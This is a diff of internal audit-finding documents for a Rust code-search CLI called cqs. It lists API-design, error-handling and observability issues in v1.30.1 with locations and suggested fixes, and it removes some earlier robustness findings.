+- **Difficulty:** easy
+- **Location:** `CONTRIBUTING.md` (architecture overview), and CLAUDE.md / MEMORY.md cross-check
+- **Description:** Per `MEMORY.md` and ROADMAP, post-v1.30.1 tests are ~3001 pass + 51 ignored. CONTRIBUTING.md doesn't cite a current test count, but the architecture overview's parser/store/embedder claims still reference 54 languages + 29 chunk types — those line up with `src/language/mod.rs` (count of `define_chunk_types!` entries = 29 by manual count: Function, Method, Class, Struct, Enum, Trait, Interface, Constant, Section, Property, Delegate, Event, Module, Macro, Object, TypeAlias, Extension, Constructor, Impl, ConfigKey, Test, Variable, Endpoint, Service, StoredProc, Extern, Namespace, Middleware, Modifier). README:655 says "10 named + 19 other = 29" implicit, also fine. So this finding is narrower than initially scoped — the actual drift is that CONTRIBUTING.md:198 says `language/` covers "54 languages + L5X/L5K" but `src/language/queries/` directory contents and `language_names()` registry should be cross-checked. **Skip if not actionable; the bigger issue is the file-tree gaps captured separately.**
+- **Suggested fix:** None separate — folded into the Architecture Overview drift finding above.
+- **Existing issue:** n/a
+
+#### v1.30.0 CHANGELOG entry's `cqs cache {stats,prune,compact}` list still missing `clear` (cosmetic, historical)
+- **Difficulty:** easy
+- **Location:** `CHANGELOG.md:71`, `ROADMAP.md:131`
+- **Description:** Both the v1.30.0 CHANGELOG row and the ROADMAP "Done" row for #1105 list `cqs cache {stats,prune,compact}` — the same 3-of-4 list that triage P2.10 already flagged for the README and that has since been fixed at README:561 (which now correctly says `cqs cache stats/clear/prune/compact`). The historical CHANGELOG/ROADMAP entries weren't backfilled. Low-impact because they are historical, but they are the rows agents read when verifying "did `clear` exist at v1.30.0 release time?" The answer is yes — see `src/cli/commands/infra/cache_cmd.rs:37,102`.
+- **Suggested fix:** In CHANGELOG.md:71 change `{stats,prune,compact}` to `{stats,clear,prune,compact}`; same edit at ROADMAP.md:131. Optionally add a brief one-liner in the v1.30.1 [Unreleased] CHANGELOG noting the doc backfill so the change is auditable.
+- **Existing issue:** none (P2.10 was the README fix only)
+# Audit Findings — API Design (v1.30.1)
+
+Scope: lib.rs `pub` surface, CLI flag surface, JSON output schemas, and daemon socket protocol — with focus on the just-shipped #1182 (watch_status / freshness) and #1134/#1135/#1136 (serve auth) APIs.
+
+## API Design
+
+#### API-V1.30.1-1: `cqs status --wait` emits a *success* envelope but exits 1 on timeout
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/infra/status.rs:85-90`
+- **Description:** On `FreshnessWait::Timeout(snap)` the handler calls `emit_snapshot(&snap, json)?` and then `std::process::exit(1)`. `emit_snapshot` routes through `crate::cli::json_envelope::emit_json(&snap)` which produces a *success* envelope (`{"data": <snap>, "error": null, "version": 1, "_meta": {...}}`). Process exit code is 1, but the envelope shape signals success. An agent that branches on `error == null` will treat the response as success, while a wrapper script that checks `$?` will treat it as failure. The two signals contradict — same situation that the `_meta` envelope contract was designed to avoid. (`cqs ping` correctly emits an *error* envelope on its failure path via `emit_json_error(IO_ERROR, msg)`; status's timeout path doesn't follow the same convention.)
+- **Suggested fix:** On `Timeout`, emit an envelope with `error: { code: "stale_index", message: "..." }` and the snapshot as a structured field on the error (or as a separate `details` field), or at minimum re-route through `emit_json_error` with the snapshot info embedded in `message`. Add a new `error_codes::STALE_INDEX` constant (currently the taxonomy only has `not_found`, `invalid_input`, `parse_error`, `io_error`, `internal`). Whichever route is taken, exit code and envelope error nullity must agree.
+
+#### API-V1.30.1-2: `--watch-fresh --wait-secs 30` (status) vs `--require-fresh-secs 600` (eval) — same operation, 20× different default budget
+- **Difficulty:** easy
+- **Location:** `src/cli/definitions.rs:792-793` (`wait_secs: default 30`) vs `src/cli/commands/eval/mod.rs:85-86` (`require_fresh_secs: default 600`)
+- **Description:** Both `cqs status --watch-fresh --wait` and `cqs eval` route through `cqs::daemon_translate::wait_for_fresh(&cqs_dir, budget)`. They are the same poll loop with the same daemon. Default budgets are 30s and 600s respectively — a 20× spread. Worse, the flag *names* differ for what is the same knob: `--wait-secs` vs `--require-fresh-secs`. An agent reading both man pages cannot reuse muscle memory; an operator who tunes one will not realize the other exists. Internally they call the same helper and resolve the same `min(600)` cap, so the wire-level semantics are identical.
+- **Suggested fix:** Pick one canonical name (`--fresh-wait-secs` reads cleanly on both subcommands) and one default. 30s makes sense for status (`--wait` is a debugging poll); 600s makes sense for eval (a 5-minute build). Resolve by either (a) making both subcommands use the same flag name and same default, or (b) documenting the divergence explicitly in both `--help` strings — currently neither `--help` mentions the other surface.
+
+#### API-V1.30.1-3: `cqs eval --no-require-fresh` is the only `--no-X` flag in the entire CLI; everywhere else uses positive flags
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/eval/mod.rs:79-80`
+- **Description:** `cqs eval --no-require-fresh` is a `clap::ArgAction::SetTrue` boolean. A grep across `src/cli/` for `long = "no-` shows this is the only `--no-X`-style flag in the public CLI surface. Every other "default-on" gate either uses (a) a positive flag with a default value (`--limit 20`), (b) an environment-variable override (`CQS_EMBEDDING_DIM`), or (c) a flag that flips off-by-default behavior on (`--rerank`, `--hyde-queries`, `--watch-fresh`). The convention in the rest of cqs is "positive flag turns thing on; absence is default" — not "negative flag turns off-by-default thing off". `cqs hook install --no-overwrite` is the only sibling, and it has a clearly opposite semantic (overwrite is the default *destructive* action that `--no-overwrite` makes safe). For `--no-require-fresh`, the gate could equally be expressed as `--require-fresh` (off-by-default) — which would match the `--watch-fresh` / `--rerank` / `--hyde-queries` pattern — at the cost of changing the default. The current shape papers over a **default-on safety gate**, which is a reasonable design choice, but it leaves the CLI surface inconsistent.
+- **Suggested fix:** Document in the eval `--help` that `--no-require-fresh` is the off-switch for a default-on gate (rare in cqs); reference `CQS_EVAL_REQUIRE_FRESH=0` as the env-var equivalent. Alternative (more invasive): rename to `--require-fresh` with `default_value_t = true`, accepting `--require-fresh=false`. The latter is the clap-idiomatic shape but breaks scripts that already pass `--no-require-fresh`. Lowest-cost fix is to leave the flag and add a doc-comment cross-reference so future reviewers don't trip.
+
+#### API-V1.30.1-4: `PingResponse.last_indexed_at` and `WatchSnapshot.last_synced_at` describe the same field with different names
+- **Difficulty:** easy
+- **Location:** `src/daemon_translate.rs:236` (`PingResponse.last_indexed_at`) vs `src/watch_status.rs:105,189` (`WatchSnapshot.last_synced_at`)
+- **Description:** Both fields are `Option<i64>` Unix-seconds timestamps for the same underlying value: the mtime of `index.db` after the most recent write. Confirmed by the doc comments — `PingResponse.last_indexed_at`: "Unix timestamp (UTC seconds) of the last write to `index.db`"; `WatchSnapshot.last_synced_at`: "Unix timestamp (UTC seconds) of the last completed reindex — the mtime of `index.db` after the most recent write." Two names for the same wire concept means: (a) agents parsing both endpoints (`cqs ping --json` and `cqs status --watch-fresh --json`) must learn two field names; (b) a future "is this index stale" helper has to choose one and ignore the other or merge them. The schemas were shipped at different times (PingResponse in v1.27, WatchSnapshot in v1.30 #1182) — this is API drift, not a deliberate distinction.
+- **Suggested fix:** Pick one name (suggest `last_indexed_at` since `cqs ping` shipped first and has more users) and rename the other. Renaming `WatchSnapshot.last_synced_at` is cheap because no external users exist yet (the field landed in v1.30 with #1182 and only the internal CLI reads it). If renaming is too disruptive, add a serde alias on one of them so both wire names deserialize.
+
+#### API-V1.30.1-5: `daemon_ping` / `daemon_status` / `daemon_reconcile` return `Result<T, String>` — stringly-typed errors on a public API
 - **Difficulty:** medium
-- **Location:** `src/slot/mod.rs:511-593`, `move_file` at `:628-638`
-- **Description:** During slot migration, files are moved one by one. On the second-or-later move failing, the function reverses the inventory and tries to move each successful destination back to its original location. A partial rollback prints `tracing::error!("rollback failed (manual recovery may be needed)")` and continues, leaving the project in a half-migrated state where `.cqs/index.db` is missing AND `.cqs/slots/default/index.db` is missing AND `.cqs/active_slot` may or may not exist. The next cqs invocation sees no legacy index, no slots, returns `Ok(false)` from migration, then errors trying to open a Store on the active slot. There is no way to detect "we are mid-failed-migration" from the user side — the recovery error message looks the same as a fresh project missing an index.
-- **Suggested fix:** Write a `.cqs/migration.lock` sentinel file at the start of migration and only remove it on full success; subsequent `migrate_legacy_index_to_default_slot` calls error if the sentinel is found, with a clear `"previous migration failed at $TIME, manually recover then `rm .cqs/migration.lock`"` message. Half-state ambiguity is the actual robustness gap, not the rollback mechanics.
+- **Location:** `src/daemon_translate.rs:271,422,541` (three sibling functions all returning `Result<T, String>`)
+- **Description:** All three daemon-client helpers in the public `cqs::daemon_translate` module return `Result<T, String>`. The error type is the *concatenated message string* assembled with `format!("connect to {} failed: {e}", ...)`. Callers cannot programmatically distinguish the failure modes that matter — "no socket / no daemon" vs "connect timed out" vs "non-ok status returned" vs "deserialize failed". The CLI surface compensates by string-matching ("no daemon running") or by lumping every failure into `IO_ERROR`. With a typed error enum, callers like `cqs eval --require-fresh` could surface a different message for "you forgot to start the daemon" vs "the daemon is responding but we can't parse its output" vs "the daemon returned an explicit error status" — today they all collapse to a single anyhow!() string. This is the same pattern called out in the CRITICAL LESSON in MEMORY.md ("error handling for new modules") — three new public helpers shipped with stringly-typed errors.
+- **Suggested fix:** Define a `pub enum DaemonClientError { NoSocket, Connect(io::Error), Timeout, NonOkStatus { code: String, message: String }, MalformedEnvelope(String), Deserialize(serde_json::Error) }` with `#[derive(thiserror::Error)]` and have all three functions return `Result<T, DaemonClientError>`. Callers can then match on the variant they care about (the eval gate's "no daemon" message is the obvious case). Keep a `Display` impl so existing `format!("{e}")` paths still produce the same human-readable strings.
 
-#### RB-V1.30-5: `libc_exdev()` hardcodes 18 — wrong on platforms where EXDEV ≠ 18
+#### API-V1.30.1-6: `DaemonReconcileResponse.queued: bool` field is documented "Always `true`" — useless field on a public response
 - **Difficulty:** easy
-- **Location:** `src/slot/mod.rs:644-647`
-- **Description:** `libc_exdev` returns the literal `18` to avoid a `libc` dependency. Linux/macOS x86_64/ARM64 all use 18, which is what the comment claims. But Windows (also a release target) uses `ERROR_NOT_SAME_DEVICE = 17`, surfaced through Rust's `io::Error::raw_os_error()` as `Some(17)`. Concretely: a user with `.cqs/` on `D:\` and the legacy `index.db` on `C:\` (junction-mounted via Windows) would hit `move_file`'s `fs::rename` with `ERROR_NOT_SAME_DEVICE`, the EXDEV branch wouldn't match (17 ≠ 18), and the migration would propagate the rename error instead of falling through to copy+remove. The user sees a hard migration failure rather than the documented copy fallback. The doc-comment claims "Windows doesn't surface EXDEV the same way (rename across filesystems just succeeds)" but that is undocumented OS behaviour, not a guarantee.
-- **Suggested fix:** Remove the magic-number EXDEV check entirely and fall back to copy+remove on *any* `fs::rename` error after a `fs::metadata().is_some()` check confirming the source file is still readable. Cheaper than getting the constant right per-platform.
+- **Location:** `src/daemon_translate.rs:517-519`
+- **Description:** `pub struct DaemonReconcileResponse { pub queued: bool, ... }`. The field's only doc comment is `/// Always `true` — the daemon flipped the signal.` If a field is invariantly true on success, it carries zero information; the success itself is signaled by `Ok(...)`. If it could be false in some edge case (e.g. daemon present but reconcile globally disabled), the field is meaningful but the doc lies. Either way the contract is broken: agents writing JSON consumers have to decide whether `queued: false` is reachable, and the doc says "no" but the *type* says "yes".
+- **Suggested fix:** Either (a) remove the `queued` field entirely — `Ok(DaemonReconcileResponse { ... })` already conveys "queued"; or (b) repurpose it to carry real info ("`true` if the request flipped the signal from `false`; `false` if it was already pending and got coalesced" — which is what `was_pending` already says inverted). Option (a) is simpler and matches the principle of "no debt in foundation layers" (MEMORY.md). Drop the field, bump the JSON_OUTPUT_VERSION constant.
 
-#### RB-V1.30-6: `cqs cache prune --older-than DAYS` accepts u32, computes negative cutoff for very large DAYS
+#### API-V1.30.1-7: `WatchSnapshotInput::_marker: PhantomData<&'a ()>` is a leaked private invariant on a public struct
 - **Difficulty:** easy
-- **Location:** `src/cache.rs:548, 551-555`
-- **Description:** `prune_older_than` takes a `u32 days` and computes `cutoff = now - days * 86400`. `u32::MAX * 86400 = 3.7e14`, well within i64 — but if `now < days * 86400` (days > current-Unix-seconds / 86400 ≈ 22.5k days = ~62 years), `cutoff` wraps negative. SQLite then prunes all entries (everything's `created_at >= 0 > cutoff`). A user typo `cqs cache prune --older-than 999999999` becomes "prune the entire cache silently". No clamp, no warn.
-- **Suggested fix:** Clamp `days` at parse time in the CLI to a sane ceiling (`days.min(36500 /* 100 years */)`), or assert `cutoff >= 0` and refuse the prune with a clear error otherwise.
+- **Location:** `src/watch_status.rs:181-193`
+- **Description:** `WatchSnapshotInput<'a>` is `pub` with all `pub` fields including `pub _marker: std::marker::PhantomData<&'a ()>`. The `_marker` doc says "Phantom keeps the API future-proof if we add borrow-only fields (e.g. last-error string). No-op today." Because it's `pub`, every external (binary-crate) construction site has to write `_marker: std::marker::PhantomData,` — the binary already does this in `src/cli/watch/mod.rs:174`. Three concerns:
+  1. The lifetime `'a` is unused (no `&'a` field). Adding one later would force every existing call site to pin a concrete lifetime, which is a breaking change anyway — the phantom lifetime defers no work.
+  2. The `pub _marker` field is verbosity tax with zero information value. Making it private with a constructor (`WatchSnapshotInput::new(...)`) hides the marker.
+  3. Today the only caller is `src/cli/watch/mod.rs` (the binary crate). The pub-ness exists because cqs is a binary and the binary needs to construct one — this means the struct should probably be `pub(crate)` or replaced with a builder.
+- **Suggested fix:** Drop the lifetime parameter and the phantom marker entirely; restore them when an actual borrowed field is added. Move construction behind a `WatchSnapshotInput::new(pending_files, pending_notes, ...)` so the field set is encapsulated. Alternative: convert to `WatchSnapshot::compute()` taking explicit named arguments (the current input struct has no behavior — it's just an arg pack).
 
-#### RB-V1.30-7: `local.rs` retry loop unwraps Mutex on every 401/403 — poison cascades the worker pool
+#### API-V1.30.1-8: `cqs status` with no flag exits 1 ("must pass --watch-fresh") — the only mode is gated on a flag the user can't avoid
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/infra/status.rs:41-54`, definitions.rs:779-794
+- **Description:** `cqs status` (no flag) prints `cqs status: pass --watch-fresh to query daemon freshness` and exits 1. The doc comment explains: "kept explicit (not the implied default) so future siblings (`--last-error`, `--clients`) can join cleanly." But today (a) `--watch-fresh` is the *only* mode, (b) future siblings don't exist yet, (c) the current behavior is non-obvious to anyone running `cqs status --help` and finding three flags but not knowing which is the default. The forward-compat design choice imposes friction on every user today for a hypothetical future. This is the design opposite of `cqs ping`, which has no required mode flag.
+- **Suggested fix:** Either (a) make `--watch-fresh` the default action when no other mode flag is set — add it as `default_value_t = true` so explicit `--watch-fresh` still parses but absence works too; or (b) keep the gate and surface a stderr hint (`"hint: try --watch-fresh"`) on the no-flag path. Option (a) is friendlier for the today-state and is reversible when future modes land — at that point a multi-mode resolution can pick a default. The "future-proof" justification is precisely the kind of premature-design that causes friction.
+
+#### API-V1.30.1-9: `FreshnessState` has `as_str()` but no `Display` — `format!("{state}")` doesn't compile
+- **Difficulty:** easy
+- **Location:** `src/watch_status.rs:51-60`
+- **Description:** `FreshnessState` provides `pub fn as_str(&self) -> &'static str` but no `Display` impl. The CLI consumer in `src/cli/commands/infra/status.rs:136` writes `println!("state: {}", snap.state.as_str())` because `{}` won't compile against the bare enum. This is a small papercut — Rust convention is that public string-returning enums implement `Display`, and consumers pay a tax of `.as_str()` everywhere they format the value. The convention also means a `tracing::info!(state = %snap.state)` would not work today; you'd have to write `tracing::info!(state = %snap.state.as_str())` or `state = ?snap.state` (which gives `Fresh` not `"fresh"`).
+- **Suggested fix:** Add `impl std::fmt::Display for FreshnessState` that delegates to `self.as_str()`. Two-line addition; pure ergonomics win.
+
+#### API-V1.30.1-10: `WatchSnapshot.idle_secs: u64` is computed via `last_event.elapsed().as_secs()` — the snapshot is *not* a snapshot in the time sense
 - **Difficulty:** medium
-- **Location:** `src/llm/local.rs:393, 394, 396`
-- **Description:** Each retry attempt does `*auth_attempts.lock().unwrap() += 1;` and `*auth_failures.lock().unwrap() += 1;`. If any worker thread panics while holding the mutex (e.g. via the test-only `on_item` callback panic the file mentions, or via a future regression in `parse_choices_content`), the mutex becomes poisoned. Every subsequent worker thread that hits a 401/403 then panics on `.unwrap()`, cascading into a thundering-herd of panicked rayon workers. The batch surface area is `concurrency` ≤ 64 — they all die, the batch fails with no auth-statistics summary, and the rayon thread pool is left in a partially-joined state.
-- **Suggested fix:** Replace `.lock().unwrap()` with explicit poison handling: `*auth_attempts.lock().unwrap_or_else(|p| p.into_inner()) += 1;` — recover from poison and continue counting. The counters are advisory (used to abort the batch when every first-try hit 401/403); a poisoned mutex shouldn't escalate to a panic cascade. Apply at all three sites.
+- **Location:** `src/watch_status.rs:101,219` (`idle_secs`); compare to `snapshot_at: i64` at line 109
+- **Description:** `WatchSnapshot` has both `snapshot_at: i64` (Unix seconds when the snapshot was published) and `idle_secs: u64` (seconds since the last filesystem event, computed at `compute()` time). The snapshot is meant to be cheaply cloneable and re-readable — but `idle_secs` is *frozen* at computation time. A daemon that publishes a snapshot at T=100 and serves it to a client at T=200 will report `idle_secs=5` (the value at T=100) when the actual live idle is 105 seconds. Every other counter (`modified_files`, `dropped_this_cycle`) is also frozen — but those are *event counts*, where freezing is the correct semantic. `idle_secs` is the only field whose value drifts as wall-clock advances; freezing it makes the wire shape lie. This isn't a bug today because the daemon publishes once per 100ms tick, but the field name and semantics are inconsistent with the rest of the struct.
+- **Suggested fix:** Document that `idle_secs` is "idle at snapshot time" not "idle now"; agents should compute live idle as `now - (snapshot_at - idle_secs)` using `last_event_at: i64` instead. Even better: replace `idle_secs` with `last_event_at: Option<i64>` (Unix seconds of the last event), so consumers can compute live idle themselves. Same shape as `last_synced_at`. Rename to make the freshness vector consistent: `last_event_at`, `last_synced_at`, `snapshot_at` — three timestamps, every consumer can compute deltas against `now()`.
+# Audit Findings — Error Handling (v1.30.1)
 
-#### RB-V1.30-8: `serve/data.rs` `i64.max(0) as u32` clamp pattern grew from 3 to 8 sites in v1.30
+Audit scope: result chains, error context, recovery paths, swallowed errors. Reviewed against `docs/audit-triage-v1.30.0.md` to skip already-fixed items.
+
+## Error Handling
+
+#### EH-V1.30.1-1: Parse failure leaves file with stale chunks AND no mtime update — reconciles forever
+- **Difficulty:** medium
+- **Location:** `src/cli/watch/reindex.rs:255-314` (`parse_file_all_with_chunk_calls` Err branch)
+- **Description:** When `parser.parse_file_all_with_chunk_calls` returns `Err` (file has a syntax error after edit), the watch loop logs a warn and emits zero chunks (`vec![]`) for that file. Two follow-on bugs:
+  1. The file's previous chunks are NOT pruned — `upsert_chunks_calls_and_prune` only runs once per file via the `by_file` HashMap, and a parse-failed file never lands in that map. Old chunks stay in the index as ghosts.
+  2. The file's `source_mtime` in `chunks.source_mtime` is never updated, so reconcile.rs:124 (`disk > stored`) keeps classifying the file as MODIFIED on every `run_daemon_reconcile` tick. Result: one syntax error in one file produces an unbounded reconcile-requeue-fail-warn loop in the journal until the file parses again.
+- **Suggested fix:** On parse failure, still call `store.touch_source_mtime(rel_path, disk_mtime)` (or equivalent) so reconcile.rs sees `disk == stored` and stops requeuing. Optionally also queue the file's chunks for deletion, matching the deleted-file branch at line 244-253. Add a parse_errors counter to `WatchSnapshot` so `cqs status --watch-fresh` can report stuck-bad-file files instead of hiding them.
+
+#### EH-V1.30.1-2: `wait_for_fresh` collapses transport AND parse/dispatch errors into `NoDaemon`
 - **Difficulty:** easy
-- **Location:** `src/serve/data.rs:299, 300, 587, 588, 777, 778, 993, 994` (8 sites post-v1.30)
-- **Description:** `line_start: line_start.max(0) as u32` and matching `line_end` continue to silently clamp DB-corruption / migration-bug `i64` values to `0` then truncate >`u32::MAX` to a low number. v1.30 expanded this pattern to 8 sites (was 3 in v1.29 triage as RB-V1.29-3). The tracking issue is filed but unresolved — the new sites should be folded into the same fix when it lands rather than re-triaged.
-- **Suggested fix:** Defer to RB-V1.29-3's resolution; flag here only because the fix scope grew. When the fix lands, `rg 'max\(0\) as u32' src/serve/data.rs` should return zero hits.
+- **Location:** `src/daemon_translate.rs:660-678`, eval consumer at `src/cli/commands/eval/mod.rs:256-263`
+- **Description:** Any `Err(msg)` from `daemon_status` — including read timeout, malformed envelope, daemon-returned non-`ok` status, JSON parse failure — collapses into `FreshnessWait::NoDaemon(msg)`. The eval gate then bails with "watch daemon not reachable: ..." and instructs the user to start `cqs watch --serve`. But if the daemon IS running and just returned a malformed status payload, telling the user to start the daemon is wrong advice. The user starts/restarts, sees the same error, and is stuck.
+- **Suggested fix:** Distinguish three cases in `wait_for_fresh`'s error path: socket-missing → `NoDaemon`; transport (connect/read/write timeout) → new `Transport(msg)` variant; envelope/parse/non-ok → new `BadResponse(msg)` variant. The eval gate's bail message should differ per variant. Alternatively, surface the verbatim daemon error string in the bail and append the "or start the daemon" advice as a hint instead of a categorical claim.
 
-#### RB-V1.30-9: HTTP redirect policy disagrees between production (`Policy::none`) and doctor (`Policy::limited(2)`)
+#### EH-V1.30.1-3: `dispatch.rs:207` swallows slot-name validation errors
 - **Difficulty:** easy
-- **Location:** `src/llm/local.rs:99` (`Policy::none()`) vs. `src/cli/commands/infra/doctor.rs:578` (`Policy::limited(2)`)
-- **Description:** Same OpenAI-compat endpoint reached two ways: production batches refuse all redirects, doctor allows up to 2. A misconfigured local server that 308-redirects from `http://x/v1` to `https://x/v1` then passes the doctor check (limited(2) follows) but every production batch silently fails (`Policy::none` rejects the redirect). User sees `cqs doctor` green and then `summarize` failing with "all attempts hit network errors" — no diagnostic linking the two. Not a panic path, but a robustness/UX gap where the two probes disagree about what counts as a working endpoint.
-- **Suggested fix:** Align the two policies. `Policy::limited(2)` in both is the safer choice — a same-origin HTTP→HTTPS redirect on bind-localhost is benign. Alternative: leave `Policy::none()` in production but log a once-per-launch warning in doctor when a redirect was followed during the probe, so the user is told their server is misconfigured before they hit it in batch.
+- **Location:** `src/cli/dispatch.rs:207`
+- **Description:** `let resolved_slot = cqs::slot::resolve_slot_name(cli.slot.as_deref(), project_cqs_dir).ok();` — `resolve_slot_name` only fails on `validate_slot_name` (the user's `--slot foo!` or `CQS_SLOT=bad/name`). Silently `.ok()`-ing the error means the persisted slot model is silently NOT loaded, but the rest of the program continues. The user gets no signal that their slot name was rejected here; if downstream slot resolution succeeds via a different path (e.g., directory existence check), the model intent is silently wrong. If it fails again later, the error message points at a different layer than the actual culprit.
+- **Suggested fix:** Replace `.ok()` with `match` that emits `tracing::warn!(error = %e, slot = ?cli.slot, "slot resolution failed when looking up persisted model intent")` before falling through to `None`. Cost: 5 lines, makes operator debugging tractable.
 
-#### RB-V1.30-10: Daemon socket-thread join detaches on timeout but doc-comment claims "joined cleanly"
-- **Difficulty:** medium (low impact in practice)
-- **Location:** `src/cli/watch.rs:2374-2400`
-- **Description:** On daemon shutdown the code polls `handle.is_finished()` for up to 5 s, then breaks out of the loop. If the thread is still running at deadline, `handle_opt` is dropped and the OS thread is detached — its memory and any in-flight Store handle are leaked until the process exits (which happens immediately after shutdown, so practically benign), but a wedged socket thread holding a Store mutex would also leak the mutex's poison state in its `Drop` order. Not a correctness bug because the process is exiting, but the surrounding tracing emits "Daemon socket thread joined cleanly" only on the `is_finished()` path — a deadline-exit is silent. Operators reading logs to confirm a clean shutdown can't tell the difference.
-- **Suggested fix:** Add a `tracing::warn!("Daemon socket thread did not exit within 5s; detaching")` log on the deadline-fall-through branch. Optionally, before detaching, force-close the listening socket from outside (`unlink` + `shutdown(2)`) to unblock any `accept()`-blocked socket thread, then re-poll `is_finished()` for another 1 s before detaching.
+#### EH-V1.30.1-4: `doctor` silently treats `list_slots` failure as empty — audit tool hides its own diagnostic
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/infra/doctor.rs:923`
+- **Description:** `let names = cqs::slot::list_slots(project_cqs_dir).unwrap_or_default();` — `cqs doctor` is the diagnostic command users run when something is wrong. If `list_slots` itself fails (permission denied on `.cqs/slots/`, IO error, etc.) the doctor reports "no slots" instead of "I couldn't read the slots directory" — the very signal the user came to find. Doctor's job is to surface failures, not paper over them.
+- **Suggested fix:** Replace with explicit `match`: on Err, emit a warn AND include the error in the doctor JSON envelope under a new `slot_listing_error` field so `cqs doctor --json` consumers can detect the failure. Same pattern other doctor checks use (e.g., daemon connectivity).
 
-Summary: 10 v1.30.0-specific findings. RB-V1.30-1, 2, 7 are the highest-impact (all reachable on the new Local LLM provider + slot codepaths). RB-V1.30-4 and 5 are slot-migration robustness — narrow but bricking when they fire. RB-V1.30-3, 6, 8, 9, 10 are defense-in-depth / consistency issues.
+#### EH-V1.30.1-5: `cqs index --json` envelope reports model="" on resolution failure, no signal
+- **Difficulty:** easy
+- **Location:** `src/cli/commands/index/build.rs:863-867`, also `chunk_count = store.chunk_count().unwrap_or(0)` line 867
+- **Description:** Two `unwrap_or` calls in the JSON envelope construction silently substitute defaults:
+  - `try_model_config().map(|c| c.name.clone()).unwrap_or_default()` → empty string
+  - `store.chunk_count().unwrap_or(0)` → 0
+  CI consumers parsing this JSON cannot distinguish "indexed 0 chunks because the corpus is empty" from "DB query failed and chunks are present but uncountable". Same for the model field. A failing post-index health check would be silently masked.
+- **Suggested fix:** Both are `Result`s. Either propagate via `?` (the index command already returns `Result`), or include explicit `error` field in the envelope when either fails. JSON consumers that opted into `--json` deserve to know when fields are unavailable vs. legitimately zero/empty.
 
+#### EH-V1.30.1-6: Reranker checksum-marker write silently dropped — re-verifies on every cold start
+- **Difficulty:** easy
+- **Location:** `src/reranker.rs:524`
+- **Description:** `let _ = std::fs::write(&marker, &expected_marker);` — the marker that records "checksums verified, skip on next launch" is written with a discarded Result. If the write fails (read-only model dir, no space, perm), every cold start re-runs blake3 on `model.onnx` (~80MB) + `tokenizer.json`. Slow startup, no operator signal that the optimization is broken. The doc-comment above just says "Write marker after successful verification" — no indication that the write itself can fail silently.
+- **Suggested fix:** `if let Err(e) = std::fs::write(&marker, &expected_marker) { tracing::warn!(error = %e, path = %marker.display(), "Failed to write reranker verification marker — next launch will re-verify checksums"); }`. Two lines, ends a silent perf loss.
+
+#### EH-V1.30.1-7: Reconcile mtime-stat error swallowed, file may oscillate as "always stale"
+- **Difficulty:** medium
+- **Location:** `src/cli/watch/reconcile.rs:116-127`, plus same pattern at `src/cli/watch/reindex.rs:501-509`
+- **Description:** `lookup_path.metadata().and_then(|m| m.modified())` on Err returns `None`, then `(Some(_), None) => false` → "leave to GC". Comment says this is intentional, but two issues:
+  1. No tracing — operators can't tell stat failures from "file genuinely missing". Permission-denied during git checkout (briefly held by a Windows AV scanner under WSL `/mnt/c/`) silently leaves the file un-reconciled until the next walk picks it up.
+  2. The pair case `(None, Some(_))` AND `(None, None)` both hit `(None, _) => true` (always requeue), but if the disk-mtime read also fails, the same file gets requeued every reconcile cycle (default 30s) without ever progressing — process_file_changes will see no event-driven trigger and reconcile alone will keep adding it.
+- **Suggested fix:** On Err, emit `tracing::debug!(path = %lookup_path.display(), error = %e, "Reconcile: stat failed, leaving file to GC")` so operators have a journal trail. Same pattern in reindex.rs:501 — silently storing `mtime=None` should at minimum warn once.
+
+#### EH-V1.30.1-8: `try_init_embedder` Err path returns from `process_file_changes` without clearing dirty flags
+- **Difficulty:** medium
+- **Location:** `src/cli/watch/events.rs:154-157` (early return) vs. the dirty flags set immediately after at lines 178-185
+- **Description:** Look at the order of operations in `process_file_changes`:
+  1. Line 154: `try_init_embedder` returns `None` on failure → bare `return`.
+  2. Lines 178/182: `set_hnsw_dirty(...)` calls happen AFTER, so this case doesn't strand dirty flags.
+
+  Reading more carefully: the flags are set BELOW the early return. The hazard is the inverse — if `set_hnsw_dirty` succeeds at line 178 but reindex_files fails between 186 and the matching `clear_hnsw_dirty_with_retry` later (e.g. SQLite busy, panic, OOM), the dirty flag stays `true` until the next successful reindex. That dirty flag drives the daemon to do a full HNSW rebuild on next startup, which is correct but expensive. There's no operator visibility into "we've been dirty for 3 cycles in a row" — each failed cycle just emits a warn and moves on.
+- **Suggested fix:** Add a counter to `WatchState` for "consecutive cycles where set-dirty succeeded but reindex failed". When > N (say 3), emit a louder warn ("HNSW has been dirty for 3 cycles — search may serve stale results until reindex completes; check journalctl for prior errors"). Surface the count in `WatchSnapshot` so `cqs status --watch-fresh` shows it. Stops a single transient failure from masking a persistent problem.
+
+# Observability Audit — v1.30.1
+
+Baseline: 550 `info_span!`/`trace_span!`/`debug_span!` sites across `src/`. Default subscriber bug fixed in v1.30.0 (OB-V1.30-1) so info-level events are now visible — exposes hot-path spam below.
+
+## Observability
+
+#### OB-V1.30.1-1: `tracing::info!` "SPLADE routing" fires on every search call — journal spam at default level
+- **Difficulty:** easy
+- **Location:** `src/search/router.rs:469-474, 491-496, 549-554`
+- **Description:** `resolve_splade_alpha()` is called on every search request (CLI, daemon dispatch, batch). Three call sites emit `tracing::info!(category, alpha, source, "SPLADE routing")` — one per call. Now that OB-V1.30-1 made the default subscriber show info-level events, each interactive `cqs search` and every batched query writes a journal line. With agents running thousands of searches per session this is high-volume noise that drowns useful events. The values rarely change after the first call (env vars resolve identically), so a once-per-process emission would carry the same diagnostic value.
+- **Suggested fix:** Demote the three "SPLADE routing" sites to `tracing::debug!`, or gate the info emission behind a `OnceLock<()>` so it fires only on first resolution per process. The existing `_span = debug_span!("resolve_splade_alpha")` already gives traceability for those who enable debug logs.
+
+#### OB-V1.30.1-2: `reclassify_with_centroid` emits `tracing::info!` for every Unknown-gap fill — per-search spam
+- **Difficulty:** easy
+- **Location:** `src/search/router.rs:1146-1150`
+- **Description:** Same problem as above on a different surface: every search whose rule-based classifier returns `Unknown` and where the centroid classifier fills the gap (a common case — `Unknown` is the default classification for many natural-language queries) emits `tracing::info!(centroid_category, margin, "centroid filled Unknown gap")`. Combined with OB-V1.30.1-1 above, a single search produces 2-3 info-level lines unrelated to the user-issued operation. Hot loop, structured field shape doesn't help when frequency is the problem.
+- **Suggested fix:** Demote to `tracing::debug!`. The function already has `info_span!("reclassify_with_centroid")` at entry which provides span-based traceability when the operator opts in.
+
